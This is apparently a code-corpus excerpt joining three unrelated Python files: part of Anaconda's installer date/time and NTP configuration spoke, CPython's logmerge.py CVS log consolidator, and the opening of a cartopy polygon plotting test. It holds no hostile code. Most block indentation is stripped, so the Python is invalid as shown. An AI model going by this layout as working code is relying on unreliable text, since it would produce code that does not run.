# no +-X suffix, just compare the strings
return locale_mod.strcoll(val1, val2)
if match1 is None or match2 is None:
# one with the +-X suffix, compare the prefixes
if match1:
prefix, _sign, _suffix = match1.groups()
return locale_mod.strcoll(prefix, val2)
else:
prefix, _sign, _suffix = match2.groups()
return locale_mod.strcoll(val1, prefix)
# both have the +-X suffix
prefix1, sign1, suffix1 = match1.groups()
prefix2, sign2, suffix2 = match2.groups()
if prefix1 == prefix2:
# same prefixes, let signs determine
return cmp(int(sign1 + suffix1), int(sign2 + suffix2))
else:
# compare prefixes
return locale_mod.strcoll(prefix1, prefix2)
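# A worked sketch: numeric suffixes compare as signed numbers, not strings,
# so 'GMT+9' sorts before 'GMT+10' and 'GMT-2' before 'GMT+1'.
#
#   _compare_cities(('GMT+9', 'GMT+9'), ('GMT+10', 'GMT+10'))  # < 0
#   _compare_cities(('GMT-2', 'GMT-2'), ('GMT+1', 'GMT+1'))    # < 0 (-2 < +1)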
def _new_date_field_box(store):
"""
Creates new date field box (a combobox and a label in a horizontal box) for
a given store.
"""
box = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL)
suffix_label = Gtk.Label()
renderer = Gtk.CellRendererText()
combo = Gtk.ComboBox(model=store)
combo.pack_start(renderer, False)
# idx is column 0, string we want to show is 1
combo.add_attribute(renderer, "text", 1)
box.pack_start(combo, False, False, 0)
box.pack_start(suffix_label, False, False, 0)
return (box, combo, suffix_label)
class NTPconfigDialog(GUIObject, GUIDialogInputCheckHandler):
builderObjects = ["ntpConfigDialog", "addImage", "serversStore"]
mainWidgetName = "ntpConfigDialog"
uiFile = "spokes/datetime_spoke.glade"
def __init__(self, *args):
GUIObject.__init__(self, *args)
GUIDialogInputCheckHandler.__init__(self)
#epoch is increased when serversStore is repopulated
self._epoch = 0
self._epoch_lock = threading.Lock()
@property
def working_server(self):
for row in self._serversStore:
if row[1] == SERVER_OK and row[2]:
#server is checked and working
return row[0]
return None
@property
def servers(self):
ret = list()
for row in self._serversStore:
if row[2]:
#server checked
ret.append(row[0])
return ret
def _render_working(self, column, renderer, model, itr, user_data=None):
#get the value in the second column
value = model[itr][1]
if value == SERVER_QUERY:
return "dialog-question"
elif value == SERVER_OK:
return "emblem-default"
else:
return "dialog-error"
def initialize(self):
self.window.set_size_request(500, 400)
workingColumn = self.builder.get_object("workingColumn")
workingRenderer = self.builder.get_object("workingRenderer")
override_cell_property(workingColumn, workingRenderer, "icon-name",
self._render_working)
self._serverEntry = self.builder.get_object("serverEntry")
self._serversStore = self.builder.get_object("serversStore")
self._addButton = self.builder.get_object("addButton")
# Validate the server entry box
self._serverCheck = self.add_check(self._serverEntry, self._validateServer)
self._serverCheck.update_check_status()
self._initialize_store_from_config()
def _initialize_store_from_config(self):
self._serversStore.clear()
if self.data.timezone.ntpservers:
for server in self.data.timezone.ntpservers:
self._add_server(server)
else:
try:
for server in ntp.get_servers_from_config():
self._add_server(server)
except ntp.NTPconfigError:
log.warning("Failed to load NTP servers configuration")
def _validateServer(self, inputcheck):
server = self.get_input(inputcheck.input_obj)
# If not set, fail the check to keep the button insensitive, but don't
# display an error
if not server:
return InputCheck.CHECK_SILENT
(valid, error) = network.sanityCheckHostname(server)
if not valid:
return "'%s' is not a valid hostname: %s" % (server, error)
else:
return InputCheck.CHECK_OK
def set_status(self, inputcheck):
# Use GUIDialogInputCheckHandler to set the error message
GUIDialogInputCheckHandler.set_status(self, inputcheck)
# Set the sensitivity of the add button based on the result
self._addButton.set_sensitive(inputcheck.check_status == InputCheck.CHECK_OK)
def refresh(self):
self._serverEntry.grab_focus()
def refresh_servers_state(self):
itr = self._serversStore.get_iter_first()
while itr:
self._refresh_server_working(itr)
itr = self._serversStore.iter_next(itr)
def run(self):
self.window.show()
rc = self.window.run()
self.window.hide()
#OK clicked
if rc == 1:
new_servers = list()
for row in self._serversStore:
#if server checked
if row[2]:
new_servers.append(row[0])
if flags.can_touch_runtime_system("save NTP servers configuration"):
ntp.save_servers_to_config(new_servers)
iutil.restart_service(NTP_SERVICE)
#Cancel clicked, window destroyed...
else:
self._epoch_lock.acquire()
self._epoch += 1
self._epoch_lock.release()
self._initialize_store_from_config()
return rc
def _set_server_ok_nok(self, itr, epoch_started):
"""
If the server is working, set its data to SERVER_OK, otherwise set its
data to SERVER_NOK.
:param itr: iterator of the server's row in the self._serversStore
"""
@gtk_action_nowait
def set_store_value(arg_tuple):
"""
We need a function for this, because this way it can be added to
the MainLoop with thread-safe GLib.idle_add (but only with one
argument).
:param arg_tuple: (store, itr, column, value)
"""
(store, itr, column, value) = arg_tuple
store.set_value(itr, column, value)
orig_hostname = self._serversStore[itr][0]
server_working = ntp.ntp_server_working(self._serversStore[itr][0])
#do not let dialog change epoch while we are modifying data
self._epoch_lock.acquire()
#check if we are in the same epoch as the dialog (and the serversStore)
#and if the server wasn't changed meanwhile
if epoch_started == self._epoch:
actual_hostname = self._serversStore[itr][0]
if orig_hostname == actual_hostname:
if server_working:
set_store_value((self._serversStore,
itr, 1, SERVER_OK))
else:
set_store_value((self._serversStore,
itr, 1, SERVER_NOK))
self._epoch_lock.release()
@gtk_action_nowait
def _refresh_server_working(self, itr):
""" Runs a new thread with _set_server_ok_nok(itr) as a taget. """
self._serversStore.set_value(itr, 1, SERVER_QUERY)
threadMgr.add(AnacondaThread(prefix="AnaNTPserver",
target=self._set_server_ok_nok,
args=(itr, self._epoch)))
def _add_server(self, server):
"""
Adds a given server to the list of servers, unless it is already
present, and asynchronously checks whether it is working.
:param server: string containing hostname
"""
for row in self._serversStore:
if row[0] == server:
#do not add duplicate items
return
itr = self._serversStore.append([server, SERVER_QUERY, True])
#do not block UI while starting thread (may take some time)
self._refresh_server_working(itr)
def on_entry_activated(self, entry, *args):
# Check that the input check has passed
if self._serverCheck.check_status == InputCheck.CHECK_OK:
self._add_server(entry.get_text())
entry.set_text("")
def on_add_clicked(self, *args):
self._serverEntry.emit("activate")
def on_use_server_toggled(self, renderer, path, *args):
itr = self._serversStore.get_iter(path)
old_value = self._serversStore[itr][2]
self._serversStore.set_value(itr, 2, not old_value)
def on_server_edited(self, renderer, path, new_text, *args):
if not path:
return
(valid, error) = network.sanityCheckHostname(new_text)
if not valid:
log.error("'%s' is not a valid hostname: %s", new_text, error)
return
itr = self._serversStore.get_iter(path)
if self._serversStore[itr][0] == new_text:
return
self._serversStore.set_value(itr, 0, new_text)
self._serversStore.set_value(itr, 1, SERVER_QUERY)
self._refresh_server_working(itr)
class DatetimeSpoke(FirstbootSpokeMixIn, NormalSpoke):
builderObjects = ["datetimeWindow",
"days", "months", "years", "regions", "cities",
"upImage", "upImage1", "upImage2", "downImage",
"downImage1", "downImage2", "downImage3", "configImage",
"citiesFilter", "daysFilter",
"cityCompletion", "regionCompletion",
]
mainWidgetName = "datetimeWindow"
uiFile = "spokes/datetime_spoke.glade"
helpFile = "DateTimeSpoke.xml"
category = LocalizationCategory
icon = "preferences-system-time-symbolic"
title = CN_("GUI|Spoke", "_TIME & DATE")
# Hack to get libtimezonemap loaded for GtkBuilder
# see https://bugzilla.gnome.org/show_bug.cgi?id=712184
_hack = TimezoneMap.TimezoneMap()
del(_hack)
def __init__(self, *args):
NormalSpoke.__init__(self, *args)
# taking values from the kickstart file?
self._kickstarted = flags.flags.automatedInstall
self._update_datetime_timer_id = None
self._start_updating_timer_id = None
self._shown = False
self._tz = None
def initialize(self):
NormalSpoke.initialize(self)
self._daysStore = self.builder.get_object("days")
self._monthsStore = self.builder.get_object("months")
self._yearsStore = self.builder.get_object("years")
self._regionsStore = self.builder.get_object("regions")
self._citiesStore = self.builder.get_object("cities")
self._tzmap = self.builder.get_object("tzmap")
self._dateBox = self.builder.get_object("dateBox")
# we need to know it the new value is the same as previous or not
self._old_region = None
self._old_city = None
self._regionCombo = self.builder.get_object("regionCombobox")
self._cityCombo = self.builder.get_object("cityCombobox")
self._daysFilter = self.builder.get_object("daysFilter")
self._daysFilter.set_visible_func(self.existing_date, None)
self._citiesFilter = self.builder.get_object("citiesFilter")
self._citiesFilter.set_visible_func(self.city_in_region, None)
self._hoursLabel = self.builder.get_object("hoursLabel")
self._minutesLabel = self.builder.get_object("minutesLabel")
self._amPmUp = self.builder.get_object("amPmUpButton")
self._amPmDown = self.builder.get_object("amPmDownButton")
self._amPmLabel = self.builder.get_object("amPmLabel")
self._radioButton24h = self.builder.get_object("timeFormatRB")
self._amPmRevealer = self.builder.get_object("amPmRevealer")
# create widgets for displaying/configuring date
day_box, self._dayCombo, day_label = _new_date_field_box(self._daysFilter)
self._dayCombo.connect("changed", self.on_day_changed)
month_box, self._monthCombo, month_label = _new_date_field_box(self._monthsStore)
self._monthCombo.connect("changed", self.on_month_changed)
year_box, self._yearCombo, year_label = _new_date_field_box(self._yearsStore)
self._yearCombo.connect("changed", self.on_year_changed)
# get the right order for date widgets and respective formats and put
# widgets in place
widgets, formats = resolve_date_format(year_box, month_box, day_box)
for widget in widgets:
self._dateBox.pack_start(widget, False, False, 0)
self._day_format, suffix = formats[widgets.index(day_box)]
day_label.set_text(suffix)
self._month_format, suffix = formats[widgets.index(month_box)]
month_label.set_text(suffix)
self._year_format, suffix = formats[widgets.index(year_box)]
year_label.set_text(suffix)
self._ntpSwitch = self.builder.get_object("networkTimeSwitch")
self._regions_zones = get_all_regions_and_timezones()
# Set the initial sensitivity of the AM/PM toggle based on the time-type selected
self._radioButton24h.emit("toggled")
if not flags.can_touch_runtime_system("modify system time and date"):
self._set_date_time_setting_sensitive(False)
self._config_dialog = NTPconfigDialog(self.data)
self._config_dialog.initialize()
threadMgr.add(AnacondaThread(name=constants.THREAD_DATE_TIME,
target=self._initialize))
def _initialize(self):
# a bit hacky way, but should return the translated strings
for i in range(1, 32):
day = datetime.date(2000, 1, i).strftime(self._day_format)
self.add_to_store_idx(self._daysStore, i, day)
for i in range(1, 13):
month = datetime.date(2000, i, 1).strftime(self._month_format)
self.add_to_store_idx(self._monthsStore, i, month)
for i in range(1990, 2051):
year = datetime.date(i, 1, 1).strftime(self._year_format)
self.add_to_store_idx(self._yearsStore, i, year)
cities = set()
xlated_regions = ((region, get_xlated_timezone(region))
for region in self._regions_zones.keys())
for region, xlated in sorted(xlated_regions, cmp=_compare_regions):
self.add_to_store_xlated(self._regionsStore, region, xlated)
for city in self._regions_zones[region]:
cities.add((city, get_xlated_timezone(city)))
for city, xlated in sorted(cities, cmp=_compare_cities):
self.add_to_store_xlated(self._citiesStore, city, xlated)
self._update_datetime_timer_id = None
if is_valid_timezone(self.data.timezone.timezone):
self._set_timezone(self.data.timezone.timezone)
elif not flags.flags.automatedInstall:
log.warning("%s is not a valid timezone, falling back to default (%s)",
self.data.timezone.timezone, DEFAULT_TZ)
self._set_timezone(DEFAULT_TZ)
self.data.timezone.timezone = DEFAULT_TZ
time_init_thread = threadMgr.get(constants.THREAD_TIME_INIT)
if time_init_thread is not None:
hubQ.send_message(self.__class__.__name__,
_("Restoring hardware time..."))
threadMgr.wait(constants.THREAD_TIME_INIT)
hubQ.send_ready(self.__class__.__name__, False)
@property
def status(self):
if self.data.timezone.timezone:
if is_valid_timezone(self.data.timezone.timezone):
return _("%s timezone") % get_xlated_timezone(self.data.timezone.timezone)
else:
return _("Invalid timezone")
else:
location = self._tzmap.get_location()
if location and location.get_property("zone"):
return _("%s timezone") % get_xlated_timezone(location.get_property("zone"))
else:
return _("Nothing selected")
def apply(self):
self._shown = False
# we could use self._tzmap.get_timezone() here, but it returns "" if
# Etc/XXXXXX timezone is selected
region = self._get_active_region()
city = self._get_active_city()
# nothing selected, just leave the spoke and
# return to hub without changing anything
if not region or not city:
return
old_tz = self.data.timezone.timezone
new_tz = region + "/" + city
self.data.timezone.timezone = new_tz
if old_tz != new_tz:
# new values, not from kickstart
self.data.timezone.seen = False
self._kickstarted = False
self.data.timezone.nontp = not self._ntpSwitch.get_active()
def execute(self):
if self._update_datetime_timer_id is not None:
GLib.source_remove(self._update_datetime_timer_id)
self._update_datetime_timer_id = None
self.data.timezone.setup(self.data)
@property
def ready(self):
return not threadMgr.get("AnaDateTimeThread")
@property
def completed(self):
if self._kickstarted and not self.data.timezone.seen:
# taking values from kickstart, but not specified
return False
else:
return is_valid_timezone(self.data.timezone.timezone)
@property
def mandatory(self):
return True
def refresh(self):
self._shown = True
#update the displayed time
self._update_datetime_timer_id = GLib.timeout_add_seconds(1,
self._update_datetime)
self._start_updating_timer_id = None
if is_valid_timezone(self.data.timezone.timezone):
self._tzmap.set_timezone(self.data.timezone.timezone)
self._update_datetime()
has_active_network = nm.nm_is_connected()
if not has_active_network:
self._show_no_network_warning()
else:
self.clear_info()
gtk_call_once(self._config_dialog.refresh_servers_state)
if flags.can_touch_runtime_system("get NTP service state"):
ntp_working = has_active_network and iutil.service_running(NTP_SERVICE)
else:
ntp_working = not self.data.timezone.nontp
self._ntpSwitch.set_active(ntp_working)
@gtk_action_wait
def _set_timezone(self, timezone):
"""
Sets timezone to the city/region comboboxes and the timezone map.
:param timezone: timezone to set
:type timezone: str
:return: if successfully set or not
:rtype: bool
"""
parts = timezone.split("/", 1)
if len(parts) != 2:
# invalid timezone cannot be set
return False
region, city = parts
self._set_combo_selection(self._regionCombo, region)
self._set_combo_selection(self._cityCombo, city)
return True
@gtk_action_nowait
def add_to_store_xlated(self, store, item, xlated):
store.append([item, xlated])
@gtk_action_nowait
def add_to_store(self, store, item):
store.append([item])
@gtk_action_nowait
def add_to_store_idx(self, store, idx, item):
store.append([idx, item])
def existing_date(self, days_model, days_iter, user_data=None):
if not days_iter:
return False
day = days_model[days_iter][0]
        #days 1-28 are in every month of every year
if day < 29:
return True
months_model = self._monthCombo.get_model()
months_iter = self._monthCombo.get_active_iter()
if not months_iter:
return True
years_model = self._yearCombo.get_model()
years_iter = self._yearCombo.get_active_iter()
if not years_iter:
return True
try:
datetime.date(years_model[years_iter][0],
months_model[months_iter][0], day)
return True
except ValueError:
return False
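    # The try/except above filters out impossible dates: days 1-28 pass
    # unconditionally, while days 29-31 must form a valid datetime.date for
    # the currently selected month and year (e.g. Feb 30 is hidden).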
def _get_active_city(self):
cities_model = self._cityCombo.get_model()
cities_iter = self._cityCombo.get_active_iter()
if not cities_iter:
return None
return cities_model[cities_iter][0]
def _get_active_region(self):
regions_model = self._regionCombo.get_model()
regions_iter = self._regionCombo.get_active_iter()
if not regions_iter:
return None
return regions_model[regions_iter][0]
def city_in_region(self, model, itr, user_data=None):
if not itr:
return False
city = model[itr][0]
region = self._get_active_region()
if not region:
return False
return city in self._regions_zones[region]
def _set_amPm_part_sensitive(self, sensitive):
for widget in (self._amPmUp, self._amPmDown, self._amPmLabel):
widget.set_sensitive(sensitive)
def _to_amPm(self, hours):
if hours >= 12:
day_phase = _("PM")
else:
day_phase = _("AM")
new_hours = ((hours - 1) % 12) + 1
return (new_hours, day_phase)
def _to_24h(self, hours, day_phase):
correction = 0
if day_phase == _("AM") and hours == 12:
correction = -12
elif day_phase == _("PM") and hours != 12:
correction = 12
return (hours + correction) % 24
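    # Illustrative round trips for the two helpers above, assuming an
    # untranslated locale where _("AM") == "AM" and _("PM") == "PM":
    #   _to_amPm(0)  -> (12, "AM")    _to_24h(12, "AM") -> 0
    #   _to_amPm(12) -> (12, "PM")    _to_24h(12, "PM") -> 12
    #   _to_amPm(23) -> (11, "PM")    _to_24h(11, "PM") -> 23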
def _update_datetime(self):
now = datetime.datetime.now(self._tz)
if self._radioButton24h.get_active():
self._hoursLabel.set_text("%0.2d" % now.hour)
else:
hours, amPm = self._to_amPm(now.hour)
self._hoursLabel.set_text("%0.2d" % hours)
self._amPmLabel.set_text(amPm)
self._minutesLabel.set_text("%0.2d" % now.minute)
self._set_combo_selection(self._dayCombo, now.day)
self._set_combo_selection(self._monthCombo, now.month)
self._set_combo_selection(self._yearCombo, now.year)
#GLib's timer is driven by the return value of the function.
        #It runs the function periodically while the returned value
#is True.
return True
def _save_system_time(self):
"""
Returning False from this method removes the timer that would
otherwise call it again and again.
"""
self._start_updating_timer_id = None
if not flags.can_touch_runtime_system("save system time"):
return False
month = self._get_combo_selection(self._monthCombo)[0]
if not month:
return False
year = self._get_combo_selection(self._yearCombo)[0]
if not year:
return False
hours = int(self._hoursLabel.get_text())
if not self._radioButton24h.get_active():
hours = self._to_24h(hours, self._amPmLabel.get_text())
minutes = int(self._minutesLabel.get_text())
day = self._get_combo_selection(self._dayCombo)[0]
#day may be None if there is no such in the selected year and month
if day:
isys.set_system_date_time(year, month, day, hours, minutes, tz=self._tz)
#start the timer only when the spoke is shown
if self._shown and not self._update_datetime_timer_id:
self._update_datetime_timer_id = GLib.timeout_add_seconds(1,
self._update_datetime)
#run only once (after first 2 seconds of inactivity)
return False
def _stop_and_maybe_start_time_updating(self, interval=2):
"""
This method is called in every date/time-setting button's callback.
It removes the timer for updating displayed date/time (do not want to
change it while user does it manually) and allows us to set new system
date/time only after $interval seconds long idle on time-setting buttons.
This is done by the _start_updating_timer that is reset in this method.
So when there is $interval seconds long idle on date/time-setting
buttons, self._save_system_time method is invoked. Since it returns
False, this timer is then removed and only reactivated in this method
(thus in some date/time-setting button's callback).
"""
#do not start timers if the spoke is not shown
if not self._shown:
self._update_datetime()
self._save_system_time()
return
#stop time updating
if self._update_datetime_timer_id:
GLib.source_remove(self._update_datetime_timer_id)
self._update_datetime_timer_id = None
#stop previous $interval seconds timer (see below)
if self._start_updating_timer_id:
GLib.source_remove(self._start_updating_timer_id)
#let the user change date/time and after $interval seconds of inactivity
#save it as the system time and start updating the displayed date/time
self._start_updating_timer_id = GLib.timeout_add_seconds(interval,
self._save_system_time)
def _set_combo_selection(self, combo, item):
model = combo.get_model()
if not model:
return False
itr = model.get_iter_first()
while itr:
if model[itr][0] == item:
combo.set_active_iter(itr)
return True
itr = model.iter_next(itr)
return False
def _get_combo_selection(self, combo):
"""
Get the selected item of the combobox.
:return: selected item or None
"""
model = combo.get_model()
itr = combo.get_active_iter()
if not itr or not model:
return None, None
return model[itr][0], model[itr][1]
def _restore_old_city_region(self):
"""Restore stored "old" (or last valid) values."""
# check if there are old values to go back to
if self._old_region and self._old_city:
self._set_timezone(self._old_region + "/" + self._old_city)
def on_up_hours_clicked(self, *args):
self._stop_and_maybe_start_time_updating()
hours = int(self._hoursLabel.get_text())
if self._radioButton24h.get_active():
new_hours = (hours + 1) % 24
else:
amPm = self._amPmLabel.get_text()
            #let's not deal with magical AM/PM arithmetic
new_hours = self._to_24h(hours, amPm)
new_hours, new_amPm = self._to_amPm((new_hours + 1) % 24)
self._amPmLabel.set_text(new_amPm)
new_hours_str = "%0.2d" % new_hours
self._hoursLabel.set_text(new_hours_str)
def on_down_hours_clicked(self, *args):
self._stop_and_maybe_start_time_updating()
hours = int(self._hoursLabel.get_text())
if self._radioButton24h.get_active():
new_hours = (hours - 1) % 24
else:
amPm = self._amPmLabel.get_text()
            #let's not deal with magical AM/PM arithmetic
new_hours = self._to_24h(hours, amPm)
new_hours, new_amPm = self._to_amPm((new_hours - 1) % 24)
self._amPmLabel.set_text(new_amPm)
new_hours_str = "%0.2d" % new_hours
self._hoursLabel.set_text(new_hours_str)
def on_up_minutes_clicked(self, *args):
self._stop_and_maybe_start_time_updating()
minutes = int(self._minutesLabel.get_text())
minutes_str = "%0.2d" % ((minutes + 1) % 60)
self._minutesLabel.set_text(minutes_str)
def on_down_minutes_clicked(self, *args):
self._stop_and_maybe_start_time_updating()
minutes = int(self._minutesLabel.get_text())
minutes_str = "%0.2d" % ((minutes - 1) % 60)
self._minutesLabel.set_text(minutes_str)
def on_updown_ampm_clicked(self, *args):
self._stop_and_maybe_start_time_updating()
if self._amPmLabel.get_text() == _("AM"):
self._amPmLabel.set_text(_("PM"))
else:
self._amPmLabel.set_text(_("AM"))
def on_region_changed(self, combo, *args):
"""
:see: on_city_changed
"""
region = self._get_active_region()
if not region or region == self._old_region:
# region entry being edited or old_value chosen, no action needed
# @see: on_city_changed
return
self._citiesFilter.refilter()
# Set the city to the first one available in this newly selected region.
zone = self._regions_zones[region]
firstCity = sorted(list(zone))[0]
self._set_combo_selection(self._cityCombo, firstCity)
self._old_region = region
self._old_city = firstCity
def on_city_changed(self, combo, *args):
"""
ComboBox emits ::changed signal not only when something is selected, but
also when its entry's text is changed. We need to distinguish between
those two cases ('London' typed in the entry => no action until ENTER is
hit etc.; 'London' chosen in the expanded combobox => update timezone
map and do all necessary actions). Fortunately when entry is being
edited, self._get_active_city returns None.
"""
timezone = None
region = self._get_active_region()
city = self._get_active_city()
if not region or not city or (region == self._old_region and
city == self._old_city):
# entry being edited or no change, no actions needed
return
if city and region:
timezone = region + "/" + city
else:
# both city and region are needed to form a valid timezone
return
if region == "Etc":
# Etc timezones cannot be displayed on the map, so let's reset the
# location and manually set a highlight with no location pin.
self._tzmap.clear_location()
if city in ("GMT", "UTC"):
offset = 0.0
# The tzdb data uses POSIX-style signs for the GMT zones, which is
# the opposite of whatever everyone else expects. GMT+4 indicates a
                # zone four hours west of Greenwich; i.e., four hours behind. Reverse
# the sign to match the libtimezone map.
else:
# Take the part after "GMT"
offset = -float(city[3:])
self._tzmap.set_selected_offset(offset)
else:
# we don't want the timezone-changed signal to be emitted
self._tzmap.set_timezone(timezone)
# update "old" values
self._old_city = city
def on_entry_left(self, entry, *args):
# user clicked somewhere else or hit TAB => finished editing
entry.emit("activate")
def on_city_region_key_released(self, entry, event, *args):
if event.type == Gdk.EventType.KEY_RELEASE and \
event.keyval == Gdk.KEY_Escape:
# editing canceled
self._restore_old_city_region()
def on_completion_match_selected(self, combo, model, itr):
item = None
if model and itr:
item = model[itr][0]
if item:
self._set_combo_selection(combo, item)
def on_city_region_text_entry_activated(self, entry):
combo = entry.get_parent()
model = combo.get_model()
entry_text = entry.get_text().lower()
for row in model:
if entry_text == row[0].lower():
self._set_combo_selection(combo, row[0])
return
# non-matching value entered, reset to old values
self._restore_old_city_region()
def on_month_changed(self, *args):
self._stop_and_maybe_start_time_updating(interval=5)
self._daysFilter.refilter()
def on_day_changed(self, *args):
self._stop_and_maybe_start_time_updating(interval=5)
def on_year_changed(self, *args):
self._stop_and_maybe_start_time_updating(interval=5)
self._daysFilter.refilter()
def on_location_changed(self, tz_map, location):
if not location:
return
timezone = location.get_property('zone')
if self._set_timezone(timezone):
# timezone successfully set
self._tz = get_timezone(timezone)
self._update_datetime()
def on_timeformat_changed(self, button24h, *args):
hours = int(self._hoursLabel.get_text())
amPm = self._amPmLabel.get_text()
#connected to 24-hour radio button
if button24h.get_active():
self._set_amPm_part_sensitive(False)
new_hours = self._to_24h(hours, amPm)
self._amPmRevealer.set_reveal_child(False)
else:
self._set_amPm_part_sensitive(True)
new_hours, new_amPm = self._to_amPm(hours)
self._amPmLabel.set_text(new_amPm)
self._amPmRevealer.set_reveal_child(True)
self._hoursLabel.set_text("%0.2d" % new_hours)
def _set_date_time_setting_sensitive(self, sensitive):
#contains all date/time setting widgets
footer_alignment = self.builder.get_object("footerAlignment")
footer_alignment.set_sensitive(sensitive)
def _show_no_network_warning(self):
self.set_warning(_("You need to set up networking first if you "\
"want to use NTP"))
def _show_no_ntp_server_warning(self):
self.set_warning(_("You have no working NTP server configured"))
def on_ntp_switched(self, switch, *args):
if switch.get_active():
#turned ON
if not flags.can_touch_runtime_system("start NTP service"):
#cannot touch runtime system, not much to do here
return
if not nm.nm_is_connected():
self._show_no_network_warning()
switch.set_active(False)
return
else:
self.clear_info()
working_server = self._config_dialog.working_server
if working_server is None:
self._show_no_ntp_server_warning()
else:
#we need a one-time sync here, because chronyd would not change
#the time as drastically as we need
ntp.one_time_sync_async(working_server)
ret = iutil.start_service(NTP_SERVICE)
self._set_date_time_setting_sensitive(False)
#if starting chronyd failed and chronyd is not running,
#set switch back to OFF
if (ret != 0) and not iutil.service_running(NTP_SERVICE):
switch.set_active(False)
else:
#turned OFF
if not flags.can_touch_runtime_system("stop NTP service"):
#cannot touch runtime system, nothing to do here
return
self._set_date_time_setting_sensitive(True)
ret = iutil.stop_service(NTP_SERVICE)
#if stopping chronyd failed and chronyd is running,
#set switch back to ON
if (ret != 0) and iutil.service_running(NTP_SERVICE):
switch.set_active(True)
self.clear_info()
def on_ntp_config_clicked(self, *args):
self._config_dialog.refresh()
with self.main_window.enlightbox(self._config_dialog.window):
response = self._config_dialog.run()
if response == 1:
self.data.timezone.ntpservers = self._config_dialog.servers
if self._config_dialog.working_server is None:
self._show_no_ntp_server_warning()
else:
self.clear_info()
| cgwalters/anaconda | pyanaconda/ui/gui/spokes/datetime_spoke.py | Python | gpl-2.0 | 39,276 |
#! /usr/bin/env python
"""Consolidate a bunch of CVS or RCS logs read from stdin.
Input should be the output of a CVS or RCS logging command, e.g.
cvs log -rrelease14:
which dumps all log messages from release1.4 upwards (assuming that
release 1.4 was tagged with tag 'release14'). Note the trailing
colon!
This collects all the revision records and outputs them sorted by date
rather than by file, collapsing duplicate revision records, i.e.,
records with the same message for different files.
The -t option causes it to truncate (discard) the last revision log
entry; this is useful when using something like the above cvs log
command, which shows the revisions including the given tag, while you
probably want everything *since* that tag.
The -r option reverses the output (oldest first; the default is oldest
last).
The -b tag option restricts the output to *only* checkin messages
belonging to the given branch tag. The form -b HEAD restricts the
output to checkin messages belonging to the CVS head (trunk). (It
produces some output if tag is a non-branch tag, but this output is
not very useful.)
-h prints this message and exits.
XXX This code was created by reverse engineering CVS 1.9 and RCS 5.7
from their output.
"""
import sys, errno, getopt, re
sep1 = '='*77 + '\n' # file separator
sep2 = '-'*28 + '\n' # revision separator
def main():
"""Main program"""
truncate_last = 0
reverse = 0
branch = None
opts, args = getopt.getopt(sys.argv[1:], "trb:h")
for o, a in opts:
if o == '-t':
truncate_last = 1
elif o == '-r':
reverse = 1
elif o == '-b':
branch = a
elif o == '-h':
print __doc__
sys.exit(0)
database = []
while 1:
chunk = read_chunk(sys.stdin)
if not chunk:
break
records = digest_chunk(chunk, branch)
if truncate_last:
del records[-1]
database[len(database):] = records
database.sort()
if not reverse:
database.reverse()
format_output(database)
def read_chunk(fp):
"""Read a chunk -- data for one file, ending with sep1.
Split the chunk in parts separated by sep2.
"""
chunk = []
lines = []
while 1:
line = fp.readline()
if not line:
break
if line == sep1:
if lines:
chunk.append(lines)
break
if line == sep2:
if lines:
chunk.append(lines)
lines = []
else:
lines.append(line)
return chunk
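# Structure of the value returned by read_chunk(): chunk[0] holds the
# per-file header lines (everything up to the first sep2), and each later
# element is one revision record -- revision line, date line, then the log
# message lines. digest_chunk() below relies on exactly this layout.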
def digest_chunk(chunk, branch=None):
"""Digest a chunk -- extract working file name and revisions"""
lines = chunk[0]
key = 'Working file:'
keylen = len(key)
for line in lines:
if line[:keylen] == key:
working_file = line[keylen:].strip()
break
else:
working_file = None
if branch is None:
pass
elif branch == "HEAD":
branch = re.compile(r"^\d+\.\d+$")
else:
revisions = {}
key = 'symbolic names:\n'
found = 0
for line in lines:
if line == key:
found = 1
elif found:
if line[0] in '\t ':
tag, rev = line.split()
if tag[-1] == ':':
tag = tag[:-1]
revisions[tag] = rev
else:
found = 0
rev = revisions.get(branch)
branch = re.compile(r"^<>$") # <> to force a mismatch by default
if rev:
if rev.find('.0.') >= 0:
rev = rev.replace('.0.', '.')
branch = re.compile(r"^" + re.escape(rev) + r"\.\d+$")
records = []
for lines in chunk[1:]:
revline = lines[0]
dateline = lines[1]
text = lines[2:]
words = dateline.split()
author = None
if len(words) >= 3 and words[0] == 'date:':
dateword = words[1]
timeword = words[2]
if timeword[-1:] == ';':
timeword = timeword[:-1]
date = dateword + ' ' + timeword
if len(words) >= 5 and words[3] == 'author:':
author = words[4]
if author[-1:] == ';':
author = author[:-1]
else:
date = None
            text.insert(0, dateline)
words = revline.split()
if len(words) >= 2 and words[0] == 'revision':
rev = words[1]
else:
# No 'revision' line -- weird...
rev = None
text.insert(0, revline)
if branch:
if rev is None or not branch.match(rev):
continue
records.append((date, working_file, rev, author, text))
return records
def format_output(database):
prevtext = None
prev = []
database.append((None, None, None, None, None)) # Sentinel
for (date, working_file, rev, author, text) in database:
if text != prevtext:
if prev:
print sep2,
for (p_date, p_working_file, p_rev, p_author) in prev:
print p_date, p_author, p_working_file, p_rev
sys.stdout.writelines(prevtext)
prev = []
prev.append((date, working_file, rev, author))
prevtext = text
if __name__ == '__main__':
try:
main()
except IOError, e:
if e.errno != errno.EPIPE:
raise
| teeple/pns_server | work/install/Python-2.7.4/Tools/scripts/logmerge.py | Python | gpl-2.0 | 5,576 |
# (C) British Crown Copyright 2011 - 2012, Met Office
#
# This file is part of cartopy.
#
# cartopy is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# cartopy is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with cartopy. If not, see <http://www.gnu.org/licenses/>.
import numpy as np
from matplotlib.testing.decorators import image_comparison as mpl_image_comparison
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
from matplotlib.collections import PatchCollection
from matplotlib.path import Path
import shapely.geometry
import cartopy.crs as ccrs
import cartopy.mpl_integration.patch as cpatch
from cartopy.tests.mpl import image_comparison
@image_comparison(baseline_images=['poly_interiors'])
def test_polygon_interiors():
ax = plt.subplot(211, projection=ccrs.PlateCarree())
ax.coastlines()
ax.set_global() # XXX could be the default???
pth = Path([[0, 45], [60, 45], [60, -45], [0, -45], [0, -45],
[10, 20], [10, -20], [40, -20], [40, 20], [10, -20]],
               [1, 2, 2, 2, 79, 1, 2, 2, 2, 79])
patches_native = []
patches = []
for geos in cpatch.path_to_geos(pth):
